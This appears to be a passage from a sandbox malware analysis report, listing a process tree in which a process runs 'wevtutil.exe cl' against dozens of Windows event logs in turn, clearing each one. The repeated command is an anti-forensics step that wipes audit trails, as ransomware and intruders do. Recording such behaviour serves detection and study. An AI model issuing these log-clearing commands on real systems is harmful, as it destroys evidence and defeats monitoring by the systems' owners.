C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Backup"
5⤵
PID:1616

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
5⤵
PID:1492

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
5⤵
PID:236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
5⤵
PID:1740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
5⤵
PID:1112

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
5⤵
PID:288

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
5⤵
PID:520

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
5⤵
PID:868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
5⤵
PID:1072

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
5⤵
PID:1652

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
5⤵
PID:1840

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
5⤵
PID:1488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
5⤵
PID:1192

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
5⤵
PID:660

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
5⤵
PID:228

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
5⤵
PID:1652

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Calculator/Debug"
5⤵
PID:1472

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"
5⤵
PID:1972

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
5⤵
PID:1308

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
5⤵
PID:1712

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
5⤵
PID:1940

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
5⤵
PID:1884

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
5⤵
PID:1244

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
5⤵
PID:1472

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
5⤵
PID:1612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
5⤵
PID:1712

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
5⤵
PID:520

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
5⤵
PID:868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
5⤵
PID:828

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
5⤵
PID:1716

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
5⤵
PID:1836

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
5⤵
PID:556

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
5⤵
PID:1988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
5⤵
PID:1940

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
5⤵
PID:1072

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
5⤵
PID:288

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
5⤵
PID:1484

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
5⤵
PID:1612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
5⤵
PID:1488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
5⤵
PID:1712

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
5⤵
PID:868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
5⤵
PID:1072

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
5⤵
PID:1616

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
5⤵
PID:1484

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
5⤵
PID:1612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
5⤵
PID:1216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
5⤵
PID:1212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
5⤵
PID:1112

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
5⤵
PID:1716

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"
5⤵
PID:1836

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DhcpNap/Operational"
5⤵
PID:1192

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
5⤵
PID:1612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
5⤵
PID:1740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
5⤵
PID:1472

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
5⤵
PID:916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
5⤵
PID:1836

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
5⤵
PID:1624

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
5⤵
PID:1612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
5⤵
PID:1980

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
5⤵
PID:1244

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
5⤵
PID:328

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
5⤵
PID:520

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
5⤵
PID:1116

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
5⤵
PID:236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
5⤵
PID:308

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
5⤵
PID:1716

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
5⤵
PID:1740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
5⤵
PID:228

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
5⤵
PID:1072

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
5⤵
PID:1392

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
5⤵
PID:1824

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-TaskManager/Debug"
5⤵
PID:828

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"
5⤵
PID:1216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"
5⤵
PID:316

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"
5⤵
PID:1356

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"
5⤵
PID:1792

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
5⤵
PID:828

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
5⤵
PID:1216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
5⤵
PID:892

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
5⤵
PID:1628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"
5⤵
PID:1336

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"
5⤵
PID:916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"
5⤵
PID:204

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"
5⤵
PID:1648

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"
5⤵
PID:1392

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"
5⤵
PID:1356

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"
5⤵
PID:1192

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"
5⤵
PID:1032

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"
5⤵
PID:1836

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"
5⤵
PID:1616

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Disk/Operational"
5⤵
PID:1824

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"
5⤵
PID:1112

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
5⤵
PID:1668

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"
5⤵
PID:428

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"
5⤵
PID:1484

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"
5⤵
PID:1616

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"
5⤵
PID:960

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Documents/Performance"
5⤵
PID:1336

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
5⤵
PID:1032

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"
5⤵
PID:1168

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"
5⤵
PID:660

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxpTaskRingtone/Analytic"
5⤵
PID:1476

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
5⤵
PID:840

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EFS/Debug"
5⤵
PID:580

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"
5⤵
PID:916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"
5⤵
PID:892

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"
5⤵
PID:1740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"
5⤵
PID:1660

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"
5⤵
PID:1116

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"
5⤵
PID:1520

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"
5⤵
PID:1712

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"
5⤵
PID:1356

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"
5⤵
PID:960

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"
5⤵
PID:1072

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Debug"
5⤵
PID:1840

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Operational"
5⤵
PID:1992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
5⤵
PID:1820

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
5⤵
PID:520

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Feedback-Service-TriggerProvider"
5⤵
PID:556

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"
5⤵
PID:868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"
5⤵
PID:1740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"
5⤵
PID:1660

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"
5⤵
PID:1032

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"
5⤵
PID:1836

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-GettingStarted/Diagnostic"
5⤵
PID:1712

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"
5⤵
PID:556

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HAL/Debug"
5⤵
PID:1116

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"
5⤵
PID:768

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"
5⤵
PID:316

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"
5⤵
PID:1712

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Help/Operational"
5⤵
PID:1196

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
5⤵
PID:1740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"
5⤵
PID:1660

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"
5⤵
PID:1472

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
5⤵
PID:1884

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"
5⤵
PID:1616

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"
5⤵
PID:236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HotStart/Diagnostic"
5⤵
PID:1224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"
5⤵
PID:1488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IKE/Operational"
5⤵
PID:560

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"
5⤵
PID:1668

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IPBusEnum/Tracing"
5⤵
PID:1308

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"
5⤵
PID:1740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
5⤵
PID:624

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-International/Operational"
5⤵
PID:204

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"
5⤵
PID:1612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"
5⤵
PID:1824

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"
5⤵
PID:204

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"
5⤵
PID:1308

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"
5⤵
PID:556

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
5⤵
PID:1620

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"
5⤵
PID:316

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"
5⤵
PID:1356

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"
5⤵
PID:1988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"
5⤵
PID:1612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"
5⤵
PID:2020

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"
5⤵
PID:1116

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Diagnostic"
5⤵
PID:624

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"
5⤵
PID:1824

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
5⤵
PID:1624

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"
5⤵
PID:1660

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
5⤵
PID:1836

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"
5⤵
PID:1032

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
5⤵
PID:1112

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"
5⤵
PID:1792

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"
5⤵
PID:1824

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"
5⤵
PID:1988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"
5⤵
PID:328

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"
5⤵
PID:1472

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"
5⤵
PID:1392

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"
5⤵
PID:316

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"
5⤵
PID:1836

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"
5⤵
PID:624

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"
5⤵
PID:1740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"
5⤵
PID:1652

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
5⤵
PID:2020

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"
5⤵
PID:792

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"
5⤵
PID:840

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"
5⤵
PID:1660

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MCT/Operational"
5⤵
PID:1336

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"
5⤵
PID:624

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"
5⤵
PID:1624

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"
5⤵
PID:1660

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"
5⤵
PID:1980

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"
5⤵
PID:1692

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"
5⤵
PID:868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Admin"
5⤵
PID:1988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"
5⤵
PID:1840

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Debug"
5⤵
PID:1648

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Operational"
5⤵
PID:1196

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
5⤵
PID:660

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
5⤵
PID:1488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
5⤵
PID:768

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
5⤵
PID:1668

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
5⤵
PID:428

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"
5⤵
PID:868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"
5⤵
PID:1740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"
5⤵
PID:1712

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
5⤵
PID:840

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
5⤵
PID:1392

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"
5⤵
PID:892

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDIS/Operational"
5⤵
PID:1116

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"
5⤵
PID:1612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"
5⤵
PID:1792

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"
5⤵
PID:840

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetShell/Performance"
5⤵
PID:1032

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
5⤵
PID:660

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/Operational"
5⤵
PID:1336

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/WHC"
5⤵
PID:576

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"
5⤵
PID:1216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"
5⤵
PID:892

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"
5⤵
PID:908

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"
5⤵
PID:1988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"
5⤵
PID:1740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"
5⤵
PID:1224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"
5⤵
PID:560

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"
5⤵
PID:1836

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OOBE-Machine/Diagnostic"
5⤵
PID:1072

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"
5⤵
PID:1472

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"
5⤵
PID:916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"
5⤵
PID:1224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"
5⤵
PID:792

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"
5⤵
PID:908

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"
5⤵
PID:1676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"
5⤵
PID:1648

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"
5⤵
PID:1476

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"
5⤵
PID:580

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PeopleNearMe/Operational"
5⤵
PID:428

C:\Windows\system32\wevtutil.exe
